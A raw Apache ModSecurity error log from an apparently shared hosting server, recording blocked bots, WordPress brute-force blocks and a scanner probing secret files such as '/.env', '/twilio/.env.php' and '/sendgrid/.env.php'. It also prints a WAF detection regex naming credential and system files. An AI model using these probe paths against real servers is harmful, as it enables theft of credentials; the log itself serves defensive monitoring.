[Tue May 26 17:52:55.357141 2026] [security2:error] [pid 937900:tid 938138] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQnk4hPNS8CpkGLtbebAAAAPE"]
[Tue May 26 17:52:56.207074 2026] [security2:error] [pid 937900:tid 938057] [client 34.41.98.139:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "consultrgb.com"] [uri "/site/index.php"] [unique_id "ahWQoE4hPNS8CpkGLtbeiQAAAKA"]
[Tue May 26 17:52:56.399905 2026] [security2:error] [pid 937900:tid 937901] [remote 20.219.17.202:57846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.17.219.20.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWQoE4hPNS8CpkGLtbekwABAQA"]
[Tue May 26 17:52:56.508893 2026] [security2:error] [pid 937900:tid 938042] [client 34.41.98.139:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "consultrgb.com"] [uri "/site/index.php"] [unique_id "ahWQoE4hPNS8CpkGLtbemQAAAJE"]
[Tue May 26 17:52:56.587066 2026] [core:error] [pid 937900:tid 938097] [client 34.41.98.139:58203] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:52:56.587086 2026] [core:error] [pid 937900:tid 938097] [client 34.41.98.139:58203] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:52:57.272902 2026] [security2:error] [pid 937900:tid 938129] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQoE4hPNS8CpkGLtbeqgAAAOg"]
[Tue May 26 17:52:57.315666 2026] [core:error] [pid 937900:tid 938066] [client 34.41.98.139:60490] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:52:57.315683 2026] [core:error] [pid 937900:tid 938066] [client 34.41.98.139:60490] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:52:57.756368 2026] [security2:error] [pid 937900:tid 938107] [client 209.107.214.188:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQoU4hPNS8CpkGLtbeugAAANI"]
[Tue May 26 17:53:00.390202 2026] [security2:error] [pid 937900:tid 938156] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQo04hPNS8CpkGLtbe-AAAAQM"]
[Tue May 26 17:53:02.129935 2026] [security2:error] [pid 937900:tid 938116] [client 47.128.42.158:53858] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.christinaspromotions.com"] [uri "/robots.txt"] [unique_id "ahWQpk4hPNS8CpkGLtbfMAAAANs"]
[Tue May 26 17:53:02.414485 2026] [security2:error] [pid 937900:tid 938103] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQpU4hPNS8CpkGLtbfKQAAAM4"]
[Tue May 26 17:53:03.281260 2026] [security2:error] [pid 937900:tid 938048] [client 43.173.180.81:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWQp04hPNS8CpkGLtbfTgAAAJc"]
[Tue May 26 17:53:04.786363 2026] [security2:error] [pid 937900:tid 938107] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQqE4hPNS8CpkGLtbfeAAAANI"]
[Tue May 26 17:53:05.139638 2026] [core:error] [pid 937900:tid 938130] [client 74.7.228.46:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:53:05.139667 2026] [core:error] [pid 937900:tid 938130] [client 74.7.228.46:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:53:05.139814 2026] [security2:error] [pid 937900:tid 938130] [client 74.7.228.46:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "webmail.thedebateafrica.org"] [uri "/___proxy_subdomain_webmail/index.php"] [unique_id "ahWQqU4hPNS8CpkGLtbfmQAAAOk"]
[Tue May 26 17:53:05.140468 2026] [security2:error] [pid 937900:tid 938062] [client 74.7.228.46:60858] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "webmail.thedebateafrica.org"] [uri "/___proxy_subdomain_webmail/robots.txt"] [unique_id "ahWQqU4hPNS8CpkGLtbflQAApVw"]
[Tue May 26 17:53:06.113095 2026] [security2:error] [pid 937900:tid 938094] [client 165.140.119.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWQqE4hPNS8CpkGLtbfgAAAAMU"], referer: https://www.bloggertarget.com
[Tue May 26 17:53:06.637461 2026] [security2:error] [pid 937900:tid 938109] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQqk4hPNS8CpkGLtbftgAAANQ"]
[Tue May 26 17:53:08.732693 2026] [security2:error] [pid 937900:tid 938051] [client 92.112.238.188:51095] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "lmialumni.org"] [uri "/wp-content/plugins/fusion-builder/readme.txt"] [unique_id "ahWQrE4hPNS8CpkGLtbf-gAAAJo"]
[Tue May 26 17:53:09.604348 2026] [security2:error] [pid 937900:tid 938144] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQrU4hPNS8CpkGLtbgBgAAAPc"]
[Tue May 26 17:53:11.737503 2026] [security2:error] [pid 937900:tid 938093] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQr04hPNS8CpkGLtbgQAAAAMQ"]
[Tue May 26 17:53:14.165736 2026] [security2:error] [pid 937900:tid 938110] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQsU4hPNS8CpkGLtbgjAAAANU"]
[Tue May 26 17:53:15.092606 2026] [security2:error] [pid 937900:tid 938106] [client 123.21.166.92:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWQs04hPNS8CpkGLtbgtAAAANE"]
[Tue May 26 17:53:16.182570 2026] [security2:error] [pid 937900:tid 938139] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQs04hPNS8CpkGLtbgxwAAAPI"]
[Tue May 26 17:53:17.357648 2026] [security2:error] [pid 937900:tid 938099] [client 213.209.159.175:59426] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "207.174.214.47"] [uri "/.env"] [unique_id "ahWQtU4hPNS8CpkGLtbhCQAAAMo"]
[Tue May 26 17:53:17.471641 2026] [security2:error] [pid 937900:tid 938097] [client 113.167.87.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWQtU4hPNS8CpkGLtbhDwAAAMg"]
[Tue May 26 17:53:17.543694 2026] [security2:error] [pid 937900:tid 938045] [client 213.209.159.175:59426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.159.209.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "207.174.214.47"] [uri "/.env.php"] [unique_id "ahWQtU4hPNS8CpkGLtbhEwAAAJQ"]
[Tue May 26 17:53:17.930169 2026] [security2:error] [pid 937900:tid 938043] [client 213.209.159.175:59442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.159.209.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "207.174.214.47"] [uri "/.env.sample.php"] [unique_id "ahWQtU4hPNS8CpkGLtbhJQAAAJI"]
[Tue May 26 17:53:18.151701 2026] [security2:error] [pid 937900:tid 937999] [remote 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhMwAA4mI"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.153373 2026] [security2:error] [pid 937900:tid 938148] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhNQAA-1c"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.166591 2026] [security2:error] [pid 937900:tid 938055] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhLgAAnlA"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.169700 2026] [security2:error] [pid 937900:tid 938073] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhMQAAsHM"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.173183 2026] [security2:error] [pid 937900:tid 938033] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhMgAAiBo"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.173808 2026] [security2:error] [pid 937900:tid 938035] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhOAAAin4"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.175055 2026] [security2:error] [pid 937900:tid 937965] [remote 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhMAAA2kA"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.177558 2026] [security2:error] [pid 937900:tid 938106] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhLwAA0SY"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.180521 2026] [security2:error] [pid 937900:tid 938068] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhNgAAq2w"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.181063 2026] [security2:error] [pid 937900:tid 938001] [remote 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhNAAAu2Q"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.181645 2026] [security2:error] [pid 937900:tid 938133] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhNwAA7FY"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.189703 2026] [security2:error] [pid 937900:tid 938049] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhQgAAmAE"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.189927 2026] [security2:error] [pid 937900:tid 938103] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhQwAAzno"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.193386 2026] [security2:error] [pid 937900:tid 938087] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhQQAAvmY"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.199808 2026] [security2:error] [pid 937900:tid 938105] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhPAAA0Hk"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.201968 2026] [security2:error] [pid 937900:tid 938144] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhPgAA93Y"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.202376 2026] [security2:error] [pid 937900:tid 938069] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhOgAArGg"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.202388 2026] [security2:error] [pid 937900:tid 938056] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhRAAAny4"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.206232 2026] [security2:error] [pid 937900:tid 937924] [remote 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhPwAA8xc"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.206497 2026] [security2:error] [pid 937900:tid 938085] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhRQAAvGM"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.206981 2026] [security2:error] [pid 937900:tid 938114] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhPQAA2XU"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.210679 2026] [security2:error] [pid 937900:tid 938126] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhOwAA5Xc"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.214414 2026] [security2:error] [pid 937900:tid 938100] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhQAAAyzE"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.218209 2026] [security2:error] [pid 937900:tid 938156] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhOQABA2s"], referer: https://ndequipments.com/listings/2020-john-deere-4052r-loader-tractor-with-factory-cab/
[Tue May 26 17:53:18.321981 2026] [security2:error] [pid 937900:tid 938054] [client 213.209.159.175:59458] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.159.209.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "207.174.214.47"] [uri "/.env.local.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhRgAAAJ0"]
[Tue May 26 17:53:18.709738 2026] [security2:error] [pid 937900:tid 938124] [client 213.209.159.175:59462] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.159.209.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "207.174.214.47"] [uri "/.env.production.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhWgAAAOM"]
[Tue May 26 17:53:18.782258 2026] [security2:error] [pid 937900:tid 938051] [client 114.119.140.66:60759] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.rsmsi.org.in"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhWwAAAJo"], referer: http://www.rsmsi.org.in/
[Tue May 26 17:53:18.893113 2026] [security2:error] [pid 937900:tid 938042] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQtk4hPNS8CpkGLtbhTwAAAJE"]
[Tue May 26 17:53:19.100464 2026] [security2:error] [pid 937900:tid 938117] [client 213.209.159.175:59464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.159.209.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "207.174.214.47"] [uri "/config.dev.php"] [unique_id "ahWQt04hPNS8CpkGLtbhYgAAANw"]
[Tue May 26 17:53:19.999360 2026] [security2:error] [pid 937900:tid 938068] [client 213.209.159.175:59484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.159.209.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "207.174.214.47"] [uri "/twilio/.env.php"] [unique_id "ahWQt04hPNS8CpkGLtbheAAAAKs"]
[Tue May 26 17:53:20.394155 2026] [security2:error] [pid 937900:tid 938046] [client 213.209.159.175:59494] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.159.209.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "207.174.214.47"] [uri "/config/.env.php"] [unique_id "ahWQuE4hPNS8CpkGLtbhhQAAAJU"]
[Tue May 26 17:53:20.780715 2026] [security2:error] [pid 937900:tid 938149] [client 213.209.159.175:59500] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.159.209.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "207.174.214.47"] [uri "/sendgrid/.env.php"] [unique_id "ahWQuE4hPNS8CpkGLtbhkwAAAPw"]
[Tue May 26 17:53:20.834739 2026] [security2:error] [pid 937900:tid 938002] [remote 109.228.50.118:46762] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.50.228.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWQuE4hPNS8CpkGLtbhiQAA_mU"]
